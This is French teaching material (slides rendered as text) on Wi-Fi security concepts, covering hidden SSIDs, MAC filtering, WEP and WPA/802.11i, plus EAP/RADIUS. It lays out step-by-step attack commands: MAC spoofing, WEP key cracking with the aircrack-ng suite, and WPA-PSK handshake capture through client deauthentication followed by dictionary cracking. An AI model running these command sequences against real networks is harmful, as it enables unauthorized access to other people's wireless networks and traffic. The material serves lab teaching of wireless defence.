Concepts de Scurit Wi-Fi

Franois-Emmanuel Goffinet goffinet@goffinet.eu Version 5, 2012

http://cisco.goffinet.org http://www.goffinet.eu

Introduction
Ce document est un support pdagogique pour expliquer les concepts de scurit des rseaux sans fil par des exercices pratiques Les auteurs de ces informations ne peuvent pas tre tenus responsables de l'usage qui en est fait Ces laboratoires sont excuts avec la distribution BackTrack5 dans une machine virtuelle VMWare et une carte AWUS036H Ce cours n'apprend pas utiliser des outils d'automation comme spoonwep ou wifite

Table des matires

1. Des scurits qui n'en sont pas
1.SSID cach 2.Filtrage par adresse MAC

2.Scurit 802.11 legacy WEP 3.Scurit 802.11i

1. Scurits qui nen sont pas

1.SSID cach 2.Filtrage par adresse MAC
De la nature inscurise des rseaux sans fil Par le fait mme que les donnes dpassent le confinement physique des murs d'un btiment, n'importe qui en dehors de ce confinement peut accder physiquement au rseau. Dans un rseau filaire, un accs direct au fil dans un btiment, soit un cble branch, est ncessaire pour un accs physique.

1. Scurits qui nen sont pas

1.1. SSID cach

1.1. SSID cach : procdure

Sur le point d'accs : Trames Beacon en broadcast (sondage passif) dsactives. Trames Probe Response dsactives pour les Probe Request contenant un SSID gnrique Any (sondage actif).

1.1. SSID cach : procdure

1.1. SSID cach : attaque

1. Ecouter le trafic des stations associes lAP. Elle connaissent son SSID. Il apparat en clair dans les trames de connexion. 2. Configurer Kismet :
nano /usr/local/etc/kismet.conf Et modifier la ligne correspondante : nsource=wlan0

Et le lancer :
kismet

1.1. SSID cach : scan

1.1. SSID cach : attaque

Quand un client se connecte, Kismet dtecte le SSID soit-disant cach

1. Scurits qui nen sont pas

1.2. Filtrage MAC

1.2. Filtrage MAC : procdure

LAP acceptera les requtes dauthentification en fonction de ladresse MAC du client. Il suffira dusurper ladresse MAC dun client dj connect.

1.2. Filtrage des adresses MAC

1.2. Filtrage MAC : attaque

1. Placer la carte en mode passif avec airmon-ng . 2. Reprer ladresse MAC dune station associe au point daccs avec airodump-ng . 3. Usurper ladresse MAC du client associ avec macchanger .

1.2. Filtrage MAC : attaque

Remarquez l'adresse MAC de la carte :

1.2. Filtrage MAC : attaque

On place la carte en mode monitor :

1.2. Filtrage MAC : attaque

On examine le client usurper :

Adresse usurper

1.2. Filtrage MAC : attaque

On arrte le monitoring et l'interface :

1.2. Filtrage MAC : attaque

Usurpation de l'adresse MAC

1.2. Filtrage MAC : attaque

Pour changer son adresse MAC : iproute2
ip link set wlan0 down ip link set wlan0 addr 00:17:3F:48:CE:7B ip link set wlan0 up

ifconfig
ifconfig eth0 down ifconfig eth0 hw ether 00:17:3F:48:CE:7B ifconfig eth0 up

Windows Registry
HKLM\SYSTEM\CurrentControlSet\Control\Class\ {4D36E972-E325-11CE-BFC1-08002BE10318}

1.2. Filtrage MAC : attaque

Configuration de la carte :

1.2. Filtrage MAC : attaque

Activation et test :

2. Scurit 802.11 legacy

WEP

WEP
802.11 (1999) : Wire Equivalent Privacy Dfinit lusage dune cl WEP pour lauthentification et/ou lencryption Lauthentification WEP est dconseille au profit dune authentification nulle

Authentification 802.11
L'authentification ouverte.
Il s'agit d'une authentification nulle, pour le principe. Celle-ci consiste seulement fournir le bon SSID (Service Set ID).

L'authentification partage.
Chaque intervenant dispose d'une mme cl WEP. Le point d'accs envoie un message en clair au client qui rpond avec un message crypt avec la cl WEP. Dans ce cas seul le client authentifie le point d'accs. Il s'agit d'une authentification asymtrique.

Fonctionnement du cryptage WEP

O C est le message chiffr IV est un vecteur d'initialisation de 24 bits ICV (Integrity Check Value) est la somme de contrle de M M est le message 'en clair' et K est la cl WEP (40 ou 104 bits) La fonction XOR (eXclusive OR), soit OU exclusif indique RC4 est l'algorithme de chiffrement La concatnation est symbolise par

Fonctionnement du cryptage WEP

Le vecteur d'initialisation est la cl de vote de la scurit du WEP, pour maintenir un niveau dcent de scurit et viter la fuite d'information l'IV doit tre incrment pour chaque paquet afin que le paquet suivant soit chiffr avec une cl diffrente. Malheureusement pour la scurit du protocole, l'IV est transmis en clair et le standard 802.11 ne rend pas obligatoire l'incrmentation de l'IV laissant cette mesure de scurit au bon vouloir de l'quipement sans fil (point d'accs ou carte sans fil).

Vulnrabilits du WEP
Cl unique pour tout le rseau Contre la confidentialit
Rutilisation de la suite chiffrante (keystream reuse) Faiblesse de RC4 (key scheduling algorithm weakness) Attaque exhaustive (cl drive d'une passphrase) Attaque statistique

Contre l'intgrit
Modification de paquets (bit flipping) Injection de faux paquets

Contre l'authentification auprs de l'AP

Fausse authentification (authentication spoofing)

Les outils dattaques WEP

Airodump-ng pour capturer le trafic intressant Aireplay-ng pour rejouer le trafic qui lui-mme va solliciter du trafic intressant pour le pirate Aircrack-ng pour cracker la cl WEP

La suite Aircrack-ng
Capturer du trafic qui contient des IVs uniques (airodump-ng). Gnrer du trafic partir de la station pirate (rejeu) pour que lAP gnre son tour du trafic intressant (aireplay-ng). Traiter les donnes collectes avec aircrack-ng afin de trouver la cl WEP.

Attaques aircrack-ng
4 types dattaques combines :
Attaque FMS/Korek/ Brute Force PTW # paquets WEP # paquets WEP 40 bits 128 bits 150.000 300.000 20.000 500.000 1.500.000 40.000

FMS/Korek/Brute Force
En 2001, Scott Fluhrer, Itsik Mantin et Adi Shamir (FMS pour faire court) publirent leur fameux papier sur la scurit WEP dans lequel ils dtaillaient deux vulnrabilits dans l'algorithme de chiffrement RC4: l'invariance weaknesses et l'attaque par IV connu. Ces deux attaques reposent sur le fait que pour certaines valeurs de la cl, il est possible pour les 1er bits de la suite chiffrante de dpendre uniquement de quelques bits de la cl (normalement chaque bit de la suite chiffrante a 50% de chance d'tre diffrent du bit de la suite chiffrante prcdente). Comme la cl est compose de la concatnation d'une cl secrte et de l'IV, certaines valeurs de cet IV gnrent des cls dites faibles. Korek (2004) amliore lattaque statistique. Le nombre de paquets ncessaires diminue fortement.

PTW
La mthode PTW (Pyshkin, Tews, Weinmann) prsente une autre analyse du flux de chiffrage RC4. Cette analyse dmontre quil y a plus de corrlations entre le flux de chiffrage RC4 et la cl WEP que celle trouve dans une attaque FMS. Cette attaque amliore celle qui est dj mise en uvre avec FMS.

Attaques aircrack-ng

Mthodes dinjection
Aireplay-ng
--deauth count : deauthenticate 1 or all stations (-0) --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --test : injection test (-9)

Deauthenticate 1 or all stations (-0)

Cette attaque envoie des paquets DAuthentification vers un ou plusieurs clients qui sont dj associs avec un AP spcifique. On lutilise dans plusieurs cas :
Retrouver un ESSID cach quand celui-ci nest pas diffus en broadcast. Capturer des handshakes WPA/WPA2 pour forcer les clients se rauthentifier. Gnrer des requtes ARP

Bien sr cette attaque est inutile lorsquil ny a pas de client associ.

Fake authentication with AP (-1)

Lattaque Fake Authentication permet de raliser les deux types dauthentification WEP (Open System et Shared Key) et de sassocier avec lAP. Cette attaque est particulirement utile quand on a besoin dun client associ alors quil ny en a pas au moment de lattaque. Elle ne gnre aucun paquet ARP. Nest pas utilisable pour lauthentification/association avec des AP WPA/WPA2.

Attaques aircrack-ng

Standard ARP-request replay (-3)

Cette attaque classique de rejeu de requtes ARP est la mthode la plus efficace et la plus fiable pour obtenir des vecteurs dinitialisation (IVs) uniques. Le logiciel aireplay-ng capture un paquet ARP et le retransmet lAP. En retour, lAP rpte le paquet ARP avec un nouvel IV. Le programme retransmet le mme paquet encore et encore, que lAP rpte chaque fois avec un nouvel IV. Tous ces IVs uniques vont servir dcouvrir la cl WEP. Un client authentifi et associ est ncessaire.

Decrypt/chopchop WEP packet (-4)

Cette attaque, quand elle russit, peut dcrypter un paquet de donne WEP sans connatre la cl WEP. Cette attaque ne retrouve pas la cl WEP mais rvle le contenu en clair. Certains AP sont vulnrables cette attaque. Si lAP limine les paquets dune taille infrieure 42 octets, aireplay-ng essaie de remplir les donnes manquantes. Si un paquet IP est captur il vrifie si le checksum de len-tte est correcte pour remplir ce qui manque. []

Fragmentation (-5)
Cette attaque, quand elle russit, peut obtenir 1500 octets de PRGA (pseudo random generation algorithm). Cette attaque ne retrouve pas la cl WEP elle-mme mais le PRGA. Le PRGA peut tre rutilis avec packetforge-ng pour diverses attaques par injection. Un seul paquet est ncessaire pour mettre en uvre cette attaque. En simplifiant, le programme rcupre une petite quantit de matriel de chiffrage et tente denvoyer lAP des paquets ARP et/ou LLC avec du contenu connu. Si le paquet revient avec succs (venant de lAP) alors une quantit plus grande dinformations de chiffrage peut tre obtenue de ce paquet de retour. Lopration est rpte autant de fois jusquau moment o on a pu rcuprer 1500 octets de PRGA.

Attaques aircrack-ng

Attaques sur le protocole WEP

Attaque sur lauthentification WEP Attaque sur lencryption WEP
Sur un rseau charg (avec client) Sur un rseau sans trafic (sans client)

Vrification des capacits dinjection

Avant toute chose, en mode monitor il faut vrifier que la carte est capable dinjecter du trafic :

Attaque sur lauthentification WEP

http://www.aircrack-ng.org/doku.php?id=shared_key

Attaque WEP avec client (1)

Mettre la carte en mode passif

Attaque WEP avec client (2)

Capture du trafic
airodump-ng -c 6 --bssid 00:0F:66:56:EF:4F -w output mon0

Attaque WEP avec client (3)

Injection tape 1 : Fausse authentification (dans une autre fentre)
Pour que du trafic inject soit accept par lAP, il faut que ladresse MAC de la station pirate soit associe.
aireplay-ng -1 0 -e dd-wrt -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0

Attaque WEP avec client (3)

Injection tape 2 : Rejeu de trafic ARP captur (dans une autre fentre)
Du trafic ARP captur est rejou car il va gnrer des IVs uniques sur base de paquet dont le contenu est contenu
aireplay-ng -3 -b 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0

Attaque WEP avec client (3)

Injection tape 2 : Rejeu de trafic ARP captur (dans une autre fentre)
Ds quune requte ARP dun client est capture et rejoue le trafic intressant devient trs vite consquent

Attaque WEP avec client (4)

Cassage de la cl avec Aircrack-ng
40.000 paquets avec IV unique sont suffisants pour que lattaque PTW russisse. Dlai de mise en uvre : 5 minutes
aircrack-ng -z -b 00:0F:66:56:EF:4F output*.cap

Attaque WEP avec client : Rsum

airmon-ng start wlan0 airodump-ng -c 6 --bssid 00:0F:66:56:EF:4F -w output mon0 aireplay-ng -1 0 -e testtest -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0 aireplay-ng -3 -b 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0 aircrack-ng -z -b 00:0F:66:56:EF:4F output*.cap

Attaque WEP sans client (1)

Mettre la carte en mode passif

Attaque WEP sans client (2)

Capture du trafic
airodump-ng -c 6 --bssid 00:0F:66:56:EF:4F -w capture mon0

Attaque WEP sans client (3)

Injection tape 1 : Fausse authentification (dans une autre fentre)
Pour que du trafic inject soit accept par lAP, il faut que ladresse MAC de la station pirate soit associe.
aireplay-ng -1 0 -e dd-wrt -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0

Attaque WEP sans client (3)

Injection tape 2 : Rcupration du PRGA (dans une autre fentre)
Ce nest pas la cl WEP mais ce fichier va servir construire un paquet ARP injecter En Fragmentation :
aireplay-ng -5 -b 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 wlan0

En Chopchop :
aireplay-ng -4 -b 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 wlan0

Attaque WEP sans client (3)

Attaque WEP sans client (3) Injection tape 3 : Construction du paquet injecter
packetforge-ng -0 -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w arp-request

Attaque WEP sans client (3) Injection tape 4 : Injection du paquet construit
aireplay-ng -2 -r arp-request mon0

Attaque WEP sans client (3) Injection tape 4

Le nombre de paquet avec IVs uniques augmente considrablement en quelques minutes:

Attaque WEP sans client (4) Cassage de la cl avec Aircrack-ng

aircrack-ng -z -b 00:0F:66:56:EF:4F capture*.cap

Attaques aircrack-ng

Attaque WEP sans client : Rsum

airmon-ng start wlan0 airodump-ng -c 11 --bssid 00:0F:66:56:EF:4F -w capture mon0 aireplay-ng -1 0 -e testtest -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0 aireplay-ng -5 -b 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 mon0 packetforge-ng -0 -a 00:0F:66:56:EF:4F -h 00:C0:CA:32:43:62 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0330-130604.xor -w arp-request aireplay-ng -2 -r arp-request mon0 aircrack-ng -z -b 00:0F:66:56:EF:4F capture*.cap

3. IEEE 802.11i

Sparation authentification/encryption

3. IEEE 802.11i
Architecture RSN : WPA/WPA2
IEEE 802.1X/EAP

802.11i architecture RSN

IEEE 802.11i dfinit l'architecture Robust Security Network (RSN) pour tablir une communication scurise (RSNAssociation) :
Phase 1 : Mise en accord sur la politique de scurit Phase 2 : Authentification 802.1X Phase 3 : Drivation et distribution des cls Phase 4 : Chiffrement et intgrit au sein d'une RSA

802.11i architecture RSN

Elments retenir ...

Source : http://www.hsc.fr/ressources/articles/hakin9_wifi/hakin9_wifi_FR.pdf

802.11i RSN Phase 1

Les politiques de scurit supportes par le point d'accs sont diffuses dans les trames Beacon et Probe Response (suivant un message Probe Request du client). Une authentification ouverte standard constitue l'tape suivante. La rponse du client aux politiques de scurit supportes est incluse dans le message Association Request valid par le message Association Response du point d'accs.

802.11i RSN Phase 1

Les informations de la politique de scurit sont envoyes dans le champ RSN IE (Information Element) dtaillant :
les mthodes d'authentification supportes (802.1X, cl pr-par-tage (PSK)), le protocole de scurit pour le chiffrement du trafic vers une seule destination (unicast) (CCMP, TKIP, etc.) suite de chiffrement pairwise, le protocole de scurit pour le chiffrement du trafic en diffusion (multicast) (CCMP, TKIP, etc.) suite de chiffrement de groupe, le support de la pr-authentifica-tion permettant aux utilisateurs de se pr-authentifier avant de basculer sur un nouveau point d'accs pour un handover en douceur.

802.11i RSN Phase 2

Authentification IEEE 802.1x

802.11i RSN Phase 3

Drivation et distribution de cls

PTK = Pairwise Transient Key GTK = Group Transient Key

802.11i RSN Phase 3

Hirarchie des cls Pairwaise

802.11i RSN Phase 3

4-Way Handshake

802.11i RSN Phase 4

Chiffrement et intgrit au sein d'une RSNA :
TKIP (Temporal Key Hash) CCMP (Counter-Mode/Cipher Block Chaining Message Authentication Code Protocol)

TKIP
Le Temporal Key Integrity Protocol est un algorithme de chiffrement sous jacent : RC4, utilis correctement (au sens cryptographique du terme) Les apports de TKIP par rapport au WEP :
Utilisation d'un algorithme de hachage cryptographique non linaire : MIC (Message Integrity Code) bas sur Michael (Niels Ferguson) Impossibilit de rutiliser un mme IV avec la mme clef (l'IV joue maintenant un rle de compteur appell TSC (TKIP Sequence Counter)) et augmentation de la taille de l'IV 48 bits Utilisation de cls de 128 bits (et non 40 ou 104 bits pour le WEP) Intgre des mcanismes de distribution et de changement de cls Utilise une cl diffrente pour le chiffrement de chaque paquet : PPK (Per Packet Key)

CCMP
CCMP est bas sur le chiffrement par bloc AES (Advanced Encryption Standard) dans son
mode d'opration CCM avec une taille de cl et de bloc de 128 bits. CCMP utilise le mode compteur en combinaison

avec la mthode d'authentification des messages appele Cipher Block Chaining (CBC-MAC) permettant de produire un MIC. Authentification des donnes non chiffres ...

Faiblesses WPA
Attaque en brute force ou dictionnaire sur la PSK WPA/WPA2 DoS durant le 4-Way Handshake Faiblesses potentielles du MIC Attaque thorique sur possible sur les Temporal Hash Key du WPA Usurpation de messages 802.1X (EAPoL Logoff, EAPoL Start, EAP Failure, ...) Attaque de couches basses (brouillage PHY, DoS, d-authentifications, d-associations, etc.

Attaque PSK WPA/WPA2

Dmarrer l'interface Wireless en monitor mode
airmon-ng start wlan0 6

Collectionner les authentifications Handshake

airodump-ng -c 11 --bssid 00:0F:66:56:EF:4F -w psk wlan0

D-authentifier un client wireless

aireplay-ng -0 1 -e testtest -a 00:0F:66:56:EF:4F -c 00:17:3F:48:CE:7B wlan0

Crack de la PSK
aircrack-ng -w password.lst -b 00:0F:66:56:EF:4F psk*.cap Source : http://www.aircrack-ng.org/doku.php?id=cracking_wpa

3. IEEE 802.11i
Architecture RSN : WPA/WPA2

IEEE 802.1X/EAP

802.1X/EAP
Extensible Authentication Protocol

Authentification EAP

Authentification EAP

Configuration EAP sous WinK3

Active Directory IIS Certificate Services Internet Authentication Services (Radius) Remote Access Policy
"Step-by-Step Guide for Setting Up Secure Wireless Access in a Test Lab"

"Configuration AP 1200 Cisco avec EAP-TLS"

Configuration EAP avec FreeRadius

Lab avec une station Linux ou Windows http://ubuntuforums.org/showthread.php?t=478804

http://wiki.freeradius.org/FreeRADIUS_Active_Director

Autres concepteurs Radius

Microsoft IAS/NPS Steel-Belted Radius (Juniper Networks) Cisco Secure Access Control System (ACS) FreeRadius OpenRadius GNU Radius Network Radius BSDRadius Etc. voir http://en.wikipedia.org/wiki/List_of_RADIUS_servers

Segmentation VLANs

Autres Labs
Mise en place d'un portal captif Gestion du QoS Diagnostic Site Survey Design / intgration de la technologie Prototypes dploiement centralis Cisco, Aruba, Trapeze, HP, etc.

Sources
http://www.aircrack-ng.org/ http://www.hsc.fr/ressources/presentations/ossir-wpa-wpa2/ossir_wpa_wpa2.html http://www.hsc.fr/ressources/articles/hakin9_wifi/index.html.fr

http://www.labo-cisco.com/fr/articles/administration-reseaux/configuration-ap-1200 http://cisco.goffinet.org/wireless/